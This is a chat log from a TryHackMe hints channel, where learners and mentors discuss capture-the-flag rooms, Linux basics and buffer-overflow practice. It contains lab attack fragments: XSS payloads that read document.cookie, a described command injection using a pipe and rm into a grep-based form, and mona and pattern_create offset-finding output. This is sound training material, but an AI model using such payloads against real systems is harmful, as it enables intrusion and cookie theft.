#room-hints

1 messages · Page 54 of 1

rough helm
#

yes

#

i had a revelation

grand pivot
rough helm
#

another level

#

i'm still trying to change de directory

#

hey, @oblique cliff how can i change my dorectory what i try doesn't work

stuck fractal
#

I'd recommend doing the Learn Linux room

rough helm
stuck fractal
#

...

rough helm
#

i can't remeber

stuck fractal
#

Please read the text in the room

#

It tells you what path to use.

#

Like, explicitly

rough helm
#

sorry i read another time

plush tapir
#

Edit: Removed

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

stuck fractal
#

As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

plush tapir
#

@stuck fractal It was less a request for a hint and more clarification of a possible bug :p

stuck fractal
#

You're in the hints chat.

plush tapir
#

Aaah - Fair enough

rough helm
#

After a little less than 2 hours i succefully finish the room. Thanks @oblique cliff // @stuck fractal.

#

(2 hours only for the task 5 question 2 because i don't know how to read, thx a lot !)

oblique cliff
#

Woot!

#

2 hours better than 2 days!

#

If it makes you feel better I did James’s box for like 3 hours and got hard stuck

#

So it happens 🤷🏿‍♂️🤷🏿‍♂️

rough helm
#

i feel better now, your amazing thanks!

uneven nebula
stuck fractal
#

Check your VPN!

uneven nebula
#

🤔

#

it's connected

stuck fractal
#

Not properly, clearly

uneven nebula
stuck fractal
#

Don't trust that

#

You're getting timeouts

#

That's a network issue

#

Network = VPN

#

Therefore you need to check your VPN

uneven nebula
#

ugh

#

what should i do

stuck fractal
#

!vpnscript

proud scarabBOT
uneven nebula
#

how do i download the script bruh

oblique cliff
#

Wget, copy paste, curl, write it yourself

#

Many different ways

#

Be creative 🙂

uneven nebula
#

can i get it with the terminal?>

oblique cliff
#

Wget, copy paste, curl, write it yourself
@oblique cliff

#

All of these can be done in a terminal

uneven nebula
#

ugh

#

imma search on google

#

:))

oblique cliff
#

That should always be the first thing you do

uneven nebula
#

yup

oblique cliff
#

For anything you encounter in life

uneven nebula
#

lmao

oblique cliff
#

I’m not kidding

uneven nebula
#

ik

#

google is the answer

narrow kettle
#

Hi got problem with the crontab used from last privesc in Tartarus machine

stuck fractal
#

That's going to be an error in what you put in the script

uneven nebula
#

bruh my vm just crashed

#

ffs

narrow kettle
#

That's going to be an error in what you put in the script
@stuck fractal I used this that found on a writeup, just changed IP/Port

stuck fractal
#

There's a random newline in there

narrow kettle
#

I'll check it, thank you

surreal escarp
#

i'm at task 8 on zthweb2, i know how to use wfuzz but i cant seem to find what wordlist i should use to get the right username/note.txt

#

could anyone nudge me towards the right wordlist?

patent token
#

Did you try big.txt like the previous task uses?

surreal escarp
#

yeah weirdly did give me anything

patent token
#

I haven't done it, so I'm just spitballing. Maybe directory-2.3-medium?

surreal escarp
#

yeah i'll give it a shot

#

got it, it wasnt a typical username lol

patent token
#

🙂

atomic shuttle
#

im not asking for hints, but should i get user -> root for internal room

stuck fractal
#

That's the normal pattern

white salmon
#

Can someone give me just an additional hint on where the 2nd flag is in room Blue, Task 5? I seem to be only missing the 2nd 😅

atomic shuttle
#

it should be somewhere in Administrator @white salmon

white salmon
#

Okeeee thanksss

sick sun
#

need hint for relevant room

tidal sedge
final mortar
#

!rule 13 🙂

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

oblique cliff
#

If you give us more information sure

#

Room? Screenshots?

tame kayak
#

room: diana Initiative ctf

oblique cliff
#

Access page lies but you are connected in this case

#

You still haven’t answered which room you’re trying to ssh into

tame kayak
#

Title: [Task 12] [Easy] [Networking] Sharing is Caring
IP: 10.10.74.170

astral smelt
#

Networking doesn't have 12 tasks

tame kayak
#

Networking doesn't have 12 tasks
@astral smelt Are you refering to diana initiative ctf room?

astral smelt
#

The room is private

trim haven
#

@tame kayak what are the credentials you are using?

#

The room requires you to use nfs so I'm a little confused on why you need SSH

tame kayak
#

Ohkay I am not sure about ssh thing I was just making attempts to connect to it

#

Could you help me a bit more

trim haven
#

Why would you connect to it?

#

And even if it does, it is pretty self explanatory

#

As there is a file which contains the credentials

tame kayak
trim haven
#

So you're meant to use those credentials to ssh into it

#

You haven't even scanned the machine, no wonder you can't log in.

#

Please actually follow the room before coming here.

tame kayak
#

Sorry

steady elm
#

i am trying to solve relevant and looking for a hint, i tried everything enumerating but i got the credentials and was not able to use remmina and evil-winrm even rdp is there and tried enum4linux,rcpdump no luck

rough helm
#

hello, i'm just stuck on the "Learn Linux" room Task 11. They ask me to creat "noot.txt" and to run it but .. i can't : acces denied ? can somebody help me ?

woven mirage
#

You need tô change permissions

#

Search on google how to change permissions to execute file linux

patent token
#

Blacklist you can DM me for a very light hint if you want.

rough helm
#

i can't even change permmision

woven mirage
#

Eait

wooden mist
#

iirc you won't be able to modify the executables

#

and also just providing a path won't create a file

woven mirage
#

You shouldnt execute a text file

#

I'm in my phone right now so its hard to get in tryhackme

#

But read the task again carrefully, i'm pretty sure It doesnt tell you to execute noot.txt

rough helm
#

true

#

they only ask me to create noot.txt

#

not to run it, they ask me to run shiba1. Thanks @woven mirage

alpine lantern
#

/room/webappsec101 [Task 6] - Question 1 https://tryhackme.com/room/webappsec101

So we found the page where you can check your password (secured or not), and it displays us the command grep which is used to check the password
So we've tried adding some code in the field with the pipe and rm command, but everytime the site crashes, have you hever heard about it ?

shut pollen
#

Any heads up on Internal ?

patent token
#

Not going to give hints on that one until I stream it this week as it's rated hard.

frail void
#

not to run it, they ask me to run shiba1. Thanks @woven mirage
@rough helm it says to run ./shiba1 not run the noot text file. The shiba1 script looks to see if there is a noot.txt file created, if there is one, it gives you the flag

brave bear
#

Hi the rdp and evilwinrm is not work on relevant

patent token
#

Ok

brave bear
#

i am using the credentials i found

#

is it meant to be like that

patent token
#

¯_(ツ)_/¯

shut pollen
#

Well a lil hint maybe ?pepehands

oblique cliff
#

No

brave bear
shut pollen
patent token
#

If you would like a hint you may DM me for one.

floral valve
#

❤️ Internal box

patent token
#

Yea?

#

😀

floral valve
#

just done with the box

#

😄 nice box.. really love it

patent token
#

I'm glad you enjoyed it.

rough helm
#

@rough helm it says to run ./shiba1 not run the noot text file. The shiba1 script looks to see if there is a noot.txt file created, if there is one, it gives you the flag
@frail void i run /home/shiba1/shiba1, and it work. I understand better how it works now, thanks to you.

shut pollen
#

Ok I got a new issue. I got tge credentials but I can't seem to log in.

weary sparrow
#

How to reset my progress in tryhackme ?

#

I want to start everything for beginnings

trim haven
#

Starting everything from beginning is a little hard you might as well just make a new account.

Usually rooms can be reset by asking the room owner nicely to reset your progress.

On top of that this is the wrong channel to discuss this ;)

low sequoia
#

sorry to bother, but how do I see the content of a txt file in a windows shell?
cant seem to find something with my googling skills ._.

trim haven
#

more file.txt

#

type file.txt

patent token
#

In the future, a search such as the following would find the same. windows how to read text file

low sequoia
#

thanks

sinful beacon
#

Rly... What is the full name of James Duncan Davidson..?

sick sun
#

@patent token Nice for machine , i got it

patent token
#

🙂

#

Congrats. Can leave some thoughts in #522158404614225920 if you want. It helps us as room creators. 🙂

oblique cliff
#

what have you tried

patent token
#

I'm keeping hints pretty close to the chest on this currently.

#

Are you otherwise able to execute commands?

oblique cliff
#

mayor is that for me? idk which box he's working on, ill stop if its one of yours

patent token
#

I think it's Relevant.

oblique cliff
#

gotcha, yea ill leave it to you then 🙂

patent token
#

And can we please delete the comments that include the directory names?

#

Thank you

#

Thanks.

trim haven
#

Mayor are you still going to give that tiny hint by chance

patent token
#

If you send me a DM with where you are I'll consider it. 🙂

trim haven
#

Awesome, I'll be right over

tidal sedge
#

👀

rough helm
#

were is my message?

patent token
#

I had it deleted since it contains information pertinent to the challenge which shouldn't be shared in public yet.

rough helm
#

Ha, ok i'm sorry i did not know

patent token
#

Are you able to execute any other commands? Please don't share them, just a yes or no will work.

rough helm
#

yes

patent token
#

I'm able to change directories to that user in the challenge. Just checked it.

low sequoia
#

Room: Vulnersity
Task: 4
Question: "Try upload fa few file types to the server, what common extensions seems to be blocked?"
Answer format: .***

I tried a few files with different extensions, but every extension I tried was blocked.
What exactly does the question mean?

stuck fractal
#

What common extension (for webapp pentesting) is blocked.

low sequoia
#

ah, that sounds better, thanks

patent token
#

You can DM me if you want.

#

But try to keep spoilers to a minimum. There's a bit of one in your comment.

hasty slate
#

okay deleteing it..

graceful ermine
#

I have this doubt... I'm currently trying tryhackme CTF challenges and was giving a try to host exploitation challenges. So figuring out ssh username and passwd is the something that's part of the task? Just wanted to know if I'm on the right task.... this is all new to me 😓

#

I was trying out the easy one first

stuck fractal
#

You will need to tell us what room

#

There's 241 public rooms on the platform

graceful ermine
#

Okay sorry, DianInitiativeCTF which is currently running....

#

That room

stuck fractal
#

That's not a public room

graceful ermine
#

Okay so is there any channel where I can contact the admin for the challenges of that room?

stuck fractal
#

Isn't there a discord for the event?

graceful ermine
#

Ohh okay I guess I got redirected here....Thanks a lot

rose root
#

Hi. Any hint for Anonymous Playground room? Found some cookie and hidden site, but dont know hot to get access

random thunder
#

How do i fix this ?

stuck fractal
#

It's one or the other or the other

#

One at a time

#

| is generally recognised to mean OR

#

As is ||

#

Pick one at a time

random thunder
#

Got it i though it can take all at once

#

thanks

stuck fractal
#

You have mis spelled algorithm

random thunder
#

oops i tend to copy-paste from the room 🤷

broken quail
#

I don't know if this is the right place to ask, I have completed Nmap and I am doing networking from blue primer series. My question is what is this blue primer and red primer? I see there are a path called primer series, is it related to that?

#

Also, I'm answering all the questions through googling. Is there any kind of video or lecture that are missing from free subscibers?

stuck fractal
#

They are Dark's beginner rooms

#

If you subscribe, many rooms have videos

#

But you should be googling and reading documentation. That's what most of hacking is about

broken quail
#

Yeah, I am answering every questions through google search. It's like a find and answer game and I am liking it.

#

So I'm not missing anything, good to hear!

stuck fractal
#

If you're finding them through like, blog posts dedicated to the rooms

#

Then that's probably not so good

#

But reading documentation or stack overflow posts is good

broken quail
#

I am avoiding blogs posts called write ups.

#

After completing Nmap room, I found one in the THM blog. So I'm aboiding those posts carefully. ❤️

minor geyser
#

Any hints for Relevant? Got some creds but not sure how to test these out for any running services

patent token
#

You may dm me for a hint.

shut pollen
#

Is it a tech glitch or am I doing something wrong ?

desert charm
#

im trying the easypeasy room

#

and have connected to the ssh

#

and i found || .mysecretcronjob.sh ||

#

never mind i got root

random grail
#

hmm check your port and ip in php shell @shut pollen

shut pollen
#

Done that

#

It's all correct

#

It's showing some kinda funky daemon issues

random grail
#

i didnt play box , but you should check if there is some firewall rule that blocks outbound traffic , or something like that

stuck fractal
#

New room

#

No hints here. Please respect the rule? @shut pollen

shut pollen
#

I'll be removing that in a jiffy.

uneven nebula
#

my terminal freeze when i type that. should i be in a specific CD or i did something wrong i mean...i don't understand i have the password but can't use it cuz my terminal is not doing anything

stuck fractal
#

Check your VPN

#

Timed out is a network issue

uneven nebula
stuck fractal
#

cat

uneven nebula
#

thanksssssssssss

stuck fractal
#

The fundamentals of linux will keep coming up

sharp ether
#

hey guys, i need help with ' Gotta Catch em All' of scripting room

#

wait!, seems it's working 😆 , i thought that the script wasn't working because i had no response but i leave it running and now i see that's printing something, gonna check it carefully

uneven nebula
#

some hints? please

verbal vale
#

Which room @uneven nebula

uneven nebula
#

learning linux or something, last challenge (bonus)

#

"Linux Walk Through"

verbal vale
#

Wait let me see, I can't remember lol

uneven nebula
#

lmao

verbal vale
#

So, you need to access one of the users that can access to the /root folder

#

This was obvious

uneven nebula
#

shiba4 maybe 🤔

verbal vale
#

I'll let you search ... 😉

uneven nebula
#

:>

verbal vale
#

And the user's IDs are in a hidden file somewhere lol

rough helm
#

Hello, i need a hit too. I can't find "shiba4" Task 33 "learning linux" room

#

and the file is hide ?

trim haven
#

Use the find command

verbal vale
#

yes

uneven nebula
#

i did that:>>

verbal vale
#

I'll help you in DM to prevent spoil and spam

uneven nebula
#

the answer will be the biggest mindblow ever

trim haven
#

Wut

#

No

#

Don't give answers

uneven nebula
#

no no

rough helm
#

i try find but doesn't work

trim haven
#

Why iname?

#

and speech marks aren't needed

rough helm
#

bc i searh a binary called "shiba4"

#

so i search by name

trim haven
#

Also

#

You're searching in the home directory

#

How do you know it is in the home directory

rough helm
#

idk

#

you've true

stuck fractal
#

Then search everywhere

#

And supress errors

rough helm
#

but i can't just search by name?

stuck fractal
#

Yes you can

rough helm
#

after 20 long minutes i succeeded

ashen matrix
#

That image is a spoiler.

rough helm
#

im so dumb

#

sorry

ashen matrix
#

All good. Least you found it

rough helm
#

yes

#

it wasn't easy

#

(for me)

ashen matrix
#

Wasn't for me either

#

All start somewhere

rough helm
#

Yes you're right

alpine lantern
midnight lotus
#

anyone working on Spring? Need to bounce off couple of ideas...

#

for foothold

ashen matrix
#

@alpine lantern still having trouble?

alpine lantern
#

yep @ashen matrix

ashen matrix
#

OK to DM?

alpine lantern
#

sure

lost delta
#

I'm stuck after finding shiba4 and running it

#

when I run shiba4

stuck fractal
#

That's the password

lost delta
#

oh really?

#

of what user?

#

shiba4?

#

ok

#

lol

#

I was stuck forever

stuck fractal
#

Delete the password please

lost delta
#

deleted

stuck fractal
#

Thank you.

lost delta
#

thanks

shut pollen
#

anyone has any ideas how to exploit jenkins and stuff ?

white salmon
#

Well, what have you done already?

#

have you done any sort of enumeration or research?

shut pollen
#

Well I used SSH tunneling to connect to it over as another user.

white salmon
#

Well unless you have the creds, then maybe SSH isn't the right way

shut pollen
#

Umm........Credentials to what ?

white salmon
#

oh wait it's a windows machine

#

right

#

They don't have SSH

#

lmao

shut pollen
#

Well , it's a Linux machine.

#

I am talking about Internal cri

white salmon
#

OH

#

you should've said so in the first place

shut pollen
#

Yeah , my bad.

#

Any idea about the Jenkins stuff ?

white salmon
#

I haven't done that room in particular

#

sry

shut pollen
heady anchor
#

what room

shut pollen
#

Internal

ruby wraith
#

Room: Learn linux, Task 43: Find what's in /root/root.txt. Can anyone give me a hint, it says all information is in the room but I can't find it :/

shut pollen
#

What are your privileges ?

heady anchor
#

its hidden

#

u need to find it

shut pollen
#

Any hints on internal @heady anchor ?

heady anchor
#

its a new room

shut pollen
#

Can I DM you about this ?

white salmon
#

@dim trail you have access to a few shiba users, check if there are any interesting files they have access to

ruby wraith
#

alright

heady anchor
#

Any hints on internal @heady anchor ?
@shut pollen i am not sure if you can ask questions based on a new room

shut pollen
ruby wraith
#

@white salmon any more hints you could give me?

trim haven
#

Have you checked which uses own which files as he stated?

white salmon
#

@ruby wraith specifically shiba2 if i recall

ruby wraith
#

@trim haven i did, but i can't seem to find any intresting files that could help me

idle ruin
#

hey need hint on relevant

trim haven
#

Mayor is the only one giving out hints

#

And as it is his room I think everyone should respect that.

idle ruin
#

So, I can ask him for hints

trim haven
#

He's not online right now, I'll let him know to avoid pinging him.

idle ruin
#

Ok thanks @trim haven

lusty wigeon
#

anyone working on Spring? Need to bounce off couple of ideas...
@midnight lotus you can pm me

rough helm
#

Hello, i block on the last task "bonus challenge" in the learn linux room, can somebody help me?

#

this one.

oblique cliff
#

Look at files that are out of place that are owned by each user

rough helm
#

I'm going to try

ashen matrix
#

We need a command for that flag

sinful plaza
#

i think something is wrong with the rdp kind of buggy

#

anyone having the same issue??

sick sun
#

anyone give me ahint about internal rooms, stuck in ||jenkins||

sinful plaza
patent token
#

Muzek, you may DM me for a hint.

#

p1d0f, you may DM me for a hint on Internal.

sinful plaza
#

sure

sick sun
#

@patent token i tried harder sir, nice machine 👍

patent token
#

🙂

idle ruin
#

hey @patent token can i dm for hint ?

patent token
#

Really quick yea. About to have breakfast.

oblique cliff
#

Mayor

#

Hints >> breakfast

patent token
#

It's a VERY generic hint more than anything.

dawn folio
#

hello guys I'm beginning in pentesting and I'm trying to achieve the agent sudo room. I'm just struggling to find the appropriate exploit to use for the privileges escalation; can anyone help me with a hint or anything please ?

atomic shuttle
rose elbow
#

Hi All, any hints on SET machine.... i have found two important files one with list of usernames and other hints towards usage of weak password.......however i have tried multiple password files against the user lists but no success......am i in the right direction or brute-forcing my way in is a wrong approach?

marsh ravine
#

hi all!
can someone pls give me a hint for the root user on Wonderland room?
i have checked what commands i can run as other users with sudo -l. have no clue how to continue from here.

stuck fractal
#

What user are you now? @marsh ravine

#

I'd recommend running some enumeration scripts to be honest

marsh ravine
#

still alice, but i got the user.txt flag

stuck fractal
#

You can't get straight to root. You can tun a single command as a different user with sudo and that's it. You're going to have to exploit that.

marsh ravine
#

nothing special came on linpeas, thought i should continue with the "run python as rabbit" idea.

stuck fractal
#

It's a single very specific command

#

And you'll probably have to do some research into python privilege escalation

marsh ravine
#

thanks!

woeful sky
#

hey guys ,can i get help in room Cross-site Scripting , task 5 [DOM-Based XSS] , i did what the question ask 1 for get popup for my cookie and change the web for red but i didn't find the answer that fits the question

stuck fractal
#

If you use the correct payload then you will be given a flag

proven tree
#

In the networking room, does anyone have a hint for this question:

stuck fractal
#

It's quite like the first

#

Not the same, but similar. Same class.

proven tree
#

Thanks!

woeful sky
proven tree
#

Got it, thank you @stuck fractal upvote

stuck fractal
#

@woeful sky dismiss that

woeful sky
#

i did

stuck fractal
#

Then either you see a flag, or you didn't use the payload that it wants

woeful sky
#

i check in writeup and use there payload and still same result you think maybe restart the machine will help?

stuck fractal
#

Worth a try.

#

Writeups aren't always correct though

woeful sky
#

"keyword.innerHTML = <script>test" onmouseover="alert(document.cookie)"</script>" i use this payload any idea where wrong?

stuck fractal
#

Don't use onmouseover

#

It's in a script

#

Therefore you don't need to declare it as an attribute

woeful sky
#

i didn't solve it yet , "<script>xxx" onerror ="alert(document.cookie)"</script> .

stuck fractal
#

You're in a script tag

#

You can just write javascript

woeful sky
#

pepehands thanks

quartz ruin
#

Hi all, anyone can solve jwt challenge?

stuck fractal
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
cyan niche
#

In the blue room how can you find flags?

stuck fractal
#

The locations are hinted to in the hints

cyan niche
#

I found the first flag and then made a search for all file starting by flag

hardy quest
#

Need some help for RELEVANT. I think I am on the right direction but need some advice please 🙏🏻

patent token
#

You may DM for a hint.

white salmon
#

Hi everyone, I could use some help in room ZTH: Obscure Web Vulns. In detail I am stuck at task 14. The JWT challenge. Someone here who could help me out...

oblique cliff
#

Follow the steps exactly and it will work

white salmon
#

is the solution a complete JWT with the same payload and a new signature? Isnt this doable in jwt.io?

oblique cliff
#

I don’t remember. The steps from the previous task tell you exactly how to do it

bright beacon
#

where i should search the credentials? -- Windows10PrivEsc Task 9

worn yew
#

Roome Gotta Catch'em All! > Last flag > root user's favourite pokemon

#

Do I need to do privilege escalation to get access to the file?

stuck fractal
#

Normally if you want root's files

rough helm
#

Hello, can somebody help me i can finish the "Learning Linux" room, last Task the bonus challenge.

trim haven
#

Are you looking for a hint or help

rough helm
#

Thanks for ur message @trim haven

#

somebody already help me.

#

but Thanks anyway

empty heath
#

anybody did overflow 7? wanted to ask a question the final step

marsh garnet
#

the room Learn Linux (zthlinux) has no form to place the answers or the finnal chanlege

stuck fractal
marsh garnet
#

yes, just checked i placed it in the wrong room.

lost delta
#

On nmap question 12 I've been stuck for half an hour reading man nmap, can anyone help?

#

I already put -sU and a lot of other variants

#

That's a bug, #site-support
@stuck fractal oh wow I finished it yesterday I thought that was how it was supposed to be! haha hope I can replay it when it gets fixed

oblique cliff
#

@lost delta

lost delta
#

thanks so much!!

white salmon
#

pls hint anonymous playground thingy

stuck fractal
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
ruby hearth
#

Currently on "Linux Challenges" room and am on this question

Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.

This is the command I'm running:
||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null ||

But there is no output and it is just hanging.... or its just taking forever, is this unexpected?

stuck fractal
#

You're searching through every single file on the file system

ruby hearth
#

Am I supposed to be?

stuck fractal
#

There's not really a better way here

#

So it will take a long time

ruby hearth
#

So patience is required and expected, not a sign that I'm doing it wrong, correct?

stuck fractal
#

It will take a long time. I'm not 100% on your regex but it looks like a good start. The + confuses me there though

ruby hearth
#

The + is part of the find command, not the regex. + is new to group filenames rather than running one at a time.

stuck fractal
#

Welp, good luck

ruby hearth
#
-exec command {} +
              This variant of the -exec action runs the specified  command  on
              the  selected  files, but the command line is built by appending
              each selected file name at the end; the total number of  invoca\u2010
              tions  of  the  command  will  be  much  less than the number of
              matched files. 
#

Thanks!

ruby hearth
#

Is it supposed to take 2 hours to grep through all the files? Do I need more patience?

stuck fractal
#

Ok that seems a little steep

ruby hearth
#

That's what I was thinking..... I don't want to stop the command. And I thought I tested the command thoroughly in alice's home dir with a different string

#

||find / -type f -exec grep "^4bceb.{27}$" {} + 2> /dev/null || is my command

stuck fractal
#

The question was changed as well, it was even more impossible before

mild eagle
#

is it okay to ask for hint on relevant yet ? did some intial enumeration but cant find as solid/functioning way to utilize my findings

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

maiden stream
#

Hi, I am currently trying to access a jenkins instance that is being ran through docker. I am having trouble accessing the jenkins console/panel. I've been desperately google searching ways to access an internalized jenkins through my browser but no luck. No tools on the machine either to interact w/ jenkins

#

I believe I have to setup a proxy possibly?

heady anchor
#

I am trying to solve Git Happens room.
I just need a little hint
If anyone can, I am very pleased
@pure plaza no help or hints for new room that's the rule

trim haven
#

I believe I have to setup a proxy possibly?
@maiden stream I’ll be honest I have no clue what you’ve been looking at but I didn’t do that on Jenkins

patent token
#

DatBoiRalph you can DM me for a hint.

devout ginkgo
#

Anyone a hint for RELEVANT? I found some ports & creds but now I'm stuck

patent token
#

You may DM me for a hint.

odd panther
#

@patent token may i also dm?

patent token
#

You may.

odd panther
#

Thank you

umbral hound
#

May I also slide?

patent token
#

Huh?

heady anchor
#

@patent token i think he/she means could he/she dm too?

odd panther
#

@patent token Thank you! Really appreciate the help

patent token
#

You're welcome. Enjoy!

white salmon
#

hi in the bufferoverflowprep room task 2 I forge the payload for figuring out the offset that overwrites eip but even if the app somewhat freezes only EBP and EBX got overwritten with a cyclyc pattern

#

0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f7b4 : Contains normal cyclic pattern at ESP-0x278 (-632) : offset 2, length 632 (-> 0x0198fa2b : ESP+0x)
0BADF00D 0x0198fa30 : Contains normal cyclic pattern at ESP+0x4 (+4) : offset 638, length 462 (-> 0x0198fbfd : ESP+0x1d2)
0BADF00D [+] Examining stack (+- 1100 bytes) - looking for pointers to cyclic pattern
0BADF00D Walking stack from 0x0198f5e0 to 0x0198fe7c (0x0000089c bytes)
0BADF00D 0x0198f6e4 : Pointer into normal cyclic pattern at ESP-0x348 (-840) : 0x0198f7d0 : offset 30, length 604
0BADF00D 0x0198f6f4 : Pointer into normal cyclic pattern at ESP-0x338 (-824) : 0x0198f7d0 : offset 30, length 604

trim haven
#

Could you provide a screenshot

ashen matrix
#

Hi I am working on the Anonymous V6 room. I think I have enumerated the machine to the max. || I am looking into abusing the shared folder but I can not work out how as it is a read-only folder || Can someone supply a hint if that is correct, and if so what I should be Google Searching for more info?

white salmon
#

which part should i screenshot ?

trim haven
white salmon
#

ah alright

#

i am using the python script that recommended in the room

#

calculated the payload and generated a pattern of 1100bytes

#

the wierd thing is that it finds the offset

#

0BADF00D Cyclic pattern (normal) found at 0x0198f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0054394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00544d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)

#

634

#

however it aint finds it in eip :E

oblique cliff
#

Instead of that method why don’t you try doing the pattern offset module in metasploit?

#

I’ve never used the tool you’re using so I wouldn’t be sure how to debug it

white salmon
#

that's generate me the offset

#

i mean that's the output of the msf-pattern-create

#

-l 1100

#

or the 2 thing are not identical ?

#

alrite that's really wierd 😄

#

i have changed the pattern

#

msf-pattern_create -l 1100 -s ABC,def,123

#

and now it breaks in the "right" way

#

and i can see the eip corrupted

#

0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D [+] Examining registers
0BADF00D EIP contains normal pattern : 0x65433265 (offset 1687)

#

however

#

that's not the number that the room wants as a solution..

#

now u tell me whats going on ? 😄

oblique cliff
#

The create is the same. The pattern find just finds the match

#

Idk what you’re doing right there to find the pattern

white salmon
#

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

#

and in the immunity debuuger : !mona findmsp -distance 1100

#

0BADF00D [+] Command used:
0BADF00D !mona findmsp -distance 1100
0BADF00D [+] Looking for cyclic pattern in memory
75300000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)
0BADF00D Cyclic pattern (normal) found at 0x0086394a (length 1100 bytes)
0BADF00D Cyclic pattern (normal) found at 0x00864d7a (length 1100 bytes)
0BADF00D [+] Examining registers
0BADF00D EBP contains normal pattern : 0x41307641 (offset 630)
0BADF00D EBX contains normal pattern : 0x39754138 (offset 626)

#

it aint shows EIP

#

corrupted here see ?

oblique cliff
#

You can stop copying and pasting that

#

I can see it

#

/usr/share/metasploit-framework/tools/exploit/pattern_match.rb -l 1100 -q “pattern”

#

Do that one instead of using Mona to find the offset

white salmon
#

i should run that against some sort of memory dump i suppose

#

w/e just let it go.

#

imgona try to land the eip in the old way

oblique cliff
#

What I’m describing is the old way...?

white salmon
#

just trying to overwrite EPI instead of the fancy diff scripts and do the interval halving to find the right offset. no idea why it is breaking from +400bytes of AAAAs and not breaking from creatpattern.rb. makes 0 sense.

#

unless something is terribly wrong

patent token
#

I'm confused here.

#

It's clearly showing you the offset at 634.

white salmon
#

apperently it is the lack of my understanding, but shouldn't the mona script detect that EPI is overwritten with a cyclic pattern ?

#

i mean that's my problem that it prints a few points that got overwritten

#

0BADF00D Cyclic pattern (normal) found at 0x01b4f7b2 (length 634 bytes)

#

cause in the OVERFLOW1 challange I could overwrite EIP with AAAAAA 4141414141 and I could found it

patent token
#

It's just taking the register values upon crash and reporting them. I honestly didn't use the mona script for this as it's just a ton of unnecessary work.

white salmon
#

alright, my method here i somewhat same what you are saying find a byte array that overwrites with a known value the EIP register, however this is what I am failing to achieve in OVERFLOW2 task :/

#

anyway it is clear that i need to learn more and ask less. thx for the inputs tho and sorry about the fustration

patent token
#

So in that image your EIP is overwritten by your junk bytes (a's). If you do the same thing, but this time replace the A's with the character string you receive from pattern_create, your EIP will reflect the exact crash point in those characters.

#

Alternatively, the register there should show the same thing using the python script as well. When all else fails, use what you know.

white salmon
#

yupp but in challange 2 i cannot manage to do that

patent token
#

I'm not sure why to be honest.

white salmon
#

me neither 🙂

mystic walrus
#

Anyone On Git Happens?

trim haven
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

trim haven
#

@mystic walrus ^

mystic walrus
#

I’m Asking About The Room Git Happens

white salmon
#

alrite all : I am very sorry, seems like I have tried with too big payload :E

#

did some stackframe violation or dunno

patent token
#

12,400 is probably way too much.

white salmon
#

agreed.

patent token
white salmon
#

if i stick to the 400 recommended overflow

patent token
#

I just ran this quick as I have a local copy, and it gives me the EIP value there.

#

1100 works fine with OVERFLOW2

white salmon
#

right, as always i was the dumb dummy

#

very sorry for flooding the chat.

patent token
#

You're not a dumb dummy. Don't be down on yourself. This stuff can be difficult at first.

white salmon
#

